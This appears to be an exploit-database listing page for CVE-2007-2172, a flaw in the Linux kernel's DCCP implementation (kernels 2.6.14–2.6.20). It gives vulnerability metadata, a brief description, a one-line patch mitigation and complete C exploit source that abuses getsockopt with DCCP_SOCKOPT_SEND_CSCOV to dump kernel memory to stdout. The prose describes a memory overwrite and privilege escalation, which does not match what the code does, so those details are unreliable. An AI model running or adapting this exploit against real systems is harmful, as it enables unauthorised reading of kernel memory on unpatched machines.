header-logo
Suggest Exploit
vendor:
Linux Kernel
by:
Unknown
8.3
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Linux Kernel
Affected Version From: Linux kernel version 2.6.14
Affected Version To: Linux kernel version 2.6.20
Patch Exists: YES
Related CWE: CVE-2007-2172
CPE: o:linux:linux_kernel
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0787/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-0001/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0488/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0488/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0347/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0347/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-1049/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-1049/
Other Scripts:
Platforms Tested: Linux
2007

Linux Kernel DCCP_SOCKOPT_SEND_CSCOV Local Privilege Escalation

The exploit allows local attackers to escalate privileges on a system running the Linux kernel by exploiting a vulnerability in the DCCP_SOCKOPT_SEND_CSCOV option in the Datagram Congestion Control Protocol (DCCP) implementation. By sending a specially crafted request, an attacker can overwrite kernel memory, leading to privilege escalation.

Mitigation:

Apply the appropriate patch provided by the Linux kernel maintainers.
Source

Exploit-DB raw data:

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
               MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == (void*)-1) {
       printf("Alloc failed\n");
       return -1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
       fprintf(stderr, "socket failure!\n");
       return 1;
    }
   /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
    int len = BUFSIZE;
    int x = getsockopt(s, 269, 11, mem, &len);

    if (x == -1)
       perror("SETSOCKOPT");
    else
       printf("SUCCESS\n");

    write(1, mem, BUFSIZE);

    return 0;
}

// milw0rm.com [2007-03-28]

Navigation

Suggest Exploit

Services By CQR